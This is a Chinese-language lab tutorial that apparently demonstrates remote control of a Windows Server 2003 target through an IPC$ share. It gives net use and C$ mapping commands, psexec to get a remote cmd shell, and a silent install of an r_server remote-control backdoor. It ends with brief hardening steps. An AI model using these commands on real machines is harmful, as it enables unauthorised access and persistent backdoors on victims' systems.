利用IPC漏洞实现远程控制

0x00 漏洞说明

IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。

0x01 工具准备

操作系统:

攻击机器 任意windows系统 本次实验中我所使用的是win10 专业版

目标靶机 windows xp 或者 windows server 2003 可以虚拟机,因为最近在玩webug,就直接使用windows server 2003了

实验工具 链接:http://pan.baidu.com/s/1nuFbekh 密码:lw0n

0x02 实验过程

步骤1

使用net share命令观察目标靶机IPC$漏洞是否存在

1.png

步骤2

首先ping一下目标靶机,观察网络连通性。

然后执行 net use \ip “密码” /user:”登陆账户”命令建立IPC$连接

使用 net use z: \ip\c$ 命令,将目标靶机的C盘映射到本地z盘

2.png

完成上述命令后将会在计算机看到网络位置出现了一个新的盘符,实际上目前就可以通过可视化桌面像在本地操作一样拷贝文件。

3.png

步骤2.5

如果你想酷一点的话,我们来试试copy指令。将要使用的远程控制软件拷贝到目标靶机的C盘中。执行过程如下:


4.png

步骤3

上述命令执行完毕后,我们使用psexec启动目标靶机上的一个shell。

将路径切换到psexec程序所在路径下 ,执行如下命令:

psexec.exe \ip –u 用户名 –p 密码 cmd.exe

5.png

步骤4

接下来我们来安装控制后门并启动运行。

使用如下指令实现r_server的静默安装:r_server /install /silence

执行两次net start r_server来启动后门服务,出现如下所示,即启动成功。

6.png

步骤5

接下来,我们使用radmin来连接目标靶机上运行的r_server

7.png

添加完成后,我们将可以像在本地一样操作目标靶机

8.png

9.png

0x03 防御

1 关闭IPC$默认共享

10.png

2 关闭IPC$默认共享的依赖服务server

控制面板/管理工具/服务 找到server 关闭

3 屏蔽139,445端口

推荐阅读更多精彩内容